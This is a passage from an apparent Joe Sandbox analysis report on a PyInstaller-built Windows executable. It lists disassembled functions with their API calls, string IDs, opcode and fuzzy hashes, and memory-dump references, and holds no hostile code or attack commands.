                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12f476f87c8743e70c8b210e20a22f1b01636e2fed05d2f1e0a082253e023e8e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A215022E4D66281F9656B2E5A5113952A35F44BB2F064734DB7EC7EF6DD2CA8408340
                                                                                                                                                                                                                                              Function 00007FF6B7527D6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                              • String ID: CONOUT$
                                                                                                                                                                                                                                              • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                              • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                              • Instruction ID: 7bb057d4a1b864632c54c1fa524d2138cc32d689d2c8113b2b7deee4b25e3809
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94119322B1CB4586E7608B1AE85432962A4FB88BE4F040238EB5EC77B4DF3CD8548740
                                                                                                                                                                                                                                              Function 00007FF6B7508ED0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF6B7503FB1), ref: 00007FF6B7508EFD
                                                                                                                                                                                                                                              • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF6B7503FB1), ref: 00007FF6B7508F5A
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7509390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6B75045F4,00000000,00007FF6B7501985), ref: 00007FF6B75093C9
                                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6B7503FB1), ref: 00007FF6B7508FE5
                                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6B7503FB1), ref: 00007FF6B7509044
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6B7503FB1), ref: 00007FF6B7509055
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6B7503FB1), ref: 00007FF6B750906A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3462794448-0
                                                                                                                                                                                                                                              • Opcode ID: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                                              • Instruction ID: 9fe932e7894e609dc6cbd0b8133375de173c3dd386a6ad6ff7ae69a523ee9496
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 26419E63B1D68281EA309B1AA5106BA73A5FB85BC8F444135DF8D97BE9DF3CE501CB00
                                                                                                                                                                                                                                              Function 00007FF6B751B2C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF6B7514F11,?,?,?,?,00007FF6B751A48A,?,?,?,?,00007FF6B751718F), ref: 00007FF6B751B2D7
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6B7514F11,?,?,?,?,00007FF6B751A48A,?,?,?,?,00007FF6B751718F), ref: 00007FF6B751B30D
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6B7514F11,?,?,?,?,00007FF6B751A48A,?,?,?,?,00007FF6B751718F), ref: 00007FF6B751B33A
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6B7514F11,?,?,?,?,00007FF6B751A48A,?,?,?,?,00007FF6B751718F), ref: 00007FF6B751B34B
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6B7514F11,?,?,?,?,00007FF6B751A48A,?,?,?,?,00007FF6B751718F), ref: 00007FF6B751B35C
                                                                                                                                                                                                                                              • SetLastError.KERNEL32(?,?,?,00007FF6B7514F11,?,?,?,?,00007FF6B751A48A,?,?,?,?,00007FF6B751718F), ref: 00007FF6B751B377
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                                              • Opcode ID: 341ed06667cf8b6c5416a7ef0c6dfdccbf195f5bc763a811adde1679d5f4f530
                                                                                                                                                                                                                                              • Instruction ID: 8f0d45b7c7eba19b6f41621ab2dad24c1d84020922bbc82c8f4d57c986d1eaa5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 341ed06667cf8b6c5416a7ef0c6dfdccbf195f5bc763a811adde1679d5f4f530
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA119322F0D66682FA556B3D5A4113D62929F44BB2F044734DB6FC7EF6DE2CA8518300
                                                                                                                                                                                                                                              Function 00007FF6B7502910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6B7501B6A), ref: 00007FF6B750295E
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                              • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                              • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                              • Instruction ID: 1b6fb42ce5781a95a3f00f5674bc150965e2f73fdbac7012c130e31c6e47e7c1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F731D623B1C68552E7209B69A8506EA6394BF887D8F400136FF8DC3769EF3CD546C600
                                                                                                                                                                                                                                              Function 00007FF6B7502390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                              • String ID: Unhandled exception in script
                                                                                                                                                                                                                                              • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                              • Opcode ID: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                                              • Instruction ID: 4f478c84f023a6a7181d3303189d0353c13e641d5c7a72d187cd9806adca5729
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1313D73A1DA8289EB209F29E8552F96360FF88788F440135EB4D8BB69DF3CD105C700
                                                                                                                                                                                                                                              Function 00007FF6B7502B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF6B750918F,?,00007FF6B7503C55), ref: 00007FF6B7502BA0
                                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF6B7502C2A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                              • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                              • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                              • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                              • Instruction ID: da72ecbf80f5627dc225b90cb88e59fe1ea355414a45e7108239bb43256e7ea2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3121A16370CB8142E7219B58F8447EA73A4FB88784F400136EF8D97665EE3CE645C740
                                                                                                                                                                                                                                              Function 00007FF6B7502710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF6B7501B99), ref: 00007FF6B7502760
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                              • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                              • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                              • Instruction ID: d27cc552cf225ce873c0c471e34702811d2bfd65f2871a6c7cb8a80559a5c1e7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5218173A1CB8142E7209B58B8417EA63A4FB88384F400136FF8D93669EF7CD2458740
                                                                                                                                                                                                                                              Function 00007FF6B7519A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                              • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                              • Instruction ID: c11d35822f8e28045bc73a05a74d7cffedf6ea7700be129f990a706eb62ee28a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7F06263B0DB4681EA108B28E48477A6330AF45761F540239D7AE865F4EF2CE188C340
                                                                                                                                                                                                                                              Function 00007FF6B7529368 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                                                                                                              • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                              • Instruction ID: 0b5d01ae10140f2002900cd2911e13b10286858eadec77d9e4a0ea4370827437
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0111F23E5CA0F42FA68136EE4A63791150AF69364F144634EBAEF67FACF6CA8414100
                                                                                                                                                                                                                                              Function 00007FF6B751B390 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FlsGetValue.KERNEL32(?,?,?,00007FF6B751A5A3,?,?,00000000,00007FF6B751A83E,?,?,?,?,?,00007FF6B751A7CA), ref: 00007FF6B751B3AF
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6B751A5A3,?,?,00000000,00007FF6B751A83E,?,?,?,?,?,00007FF6B751A7CA), ref: 00007FF6B751B3CE
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6B751A5A3,?,?,00000000,00007FF6B751A83E,?,?,?,?,?,00007FF6B751A7CA), ref: 00007FF6B751B3F6
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6B751A5A3,?,?,00000000,00007FF6B751A83E,?,?,?,?,?,00007FF6B751A7CA), ref: 00007FF6B751B407
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6B751A5A3,?,?,00000000,00007FF6B751A83E,?,?,?,?,?,00007FF6B751A7CA), ref: 00007FF6B751B418
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                                              • Opcode ID: 076d9937837767d8c0599fb7139188ad361754fd070b51876ae2b58645e7f25c
                                                                                                                                                                                                                                              • Instruction ID: a25641608412af6962b6f90a1162dd7dc15549389ad82ead16ff0720a206439a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 076d9937837767d8c0599fb7139188ad361754fd070b51876ae2b58645e7f25c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D119622F0DA2241F9559B2E594117962925F44BB2F488334DB7EC6EF6DD2CF8418300
                                                                                                                                                                                                                                              Function 00007FF6B751B224 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                                              • Opcode ID: 84df6eade7ca2759e64539926e88efdc2e23a1e9973d593929f07b0eae7a4c09
                                                                                                                                                                                                                                              • Instruction ID: 2261d46ceb3bc7d2e9bc78e71854b9d4c6a5248508228b0b8a68ee9704f7abe9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 84df6eade7ca2759e64539926e88efdc2e23a1e9973d593929f07b0eae7a4c09
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF118E22E0D66341F9696B7E485117E12924F46B32F084B74DB7ECAEF3DD2DB8848301
                                                                                                                                                                                                                                              Function 00007FF6B7515FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: verbose
                                                                                                                                                                                                                                              • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                              • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                              • Instruction ID: f99eb74c11320d08b98c2a526d1315dc3e9ffcb2f44da47dced1f32cc0a6ef2f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF91BC23A0CA6681FB618F28D45037E37A1EB40B96F854136DB5E83BE6DF3DE8458341
                                                                                                                                                                                                                                              Function 00007FF6B751FBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
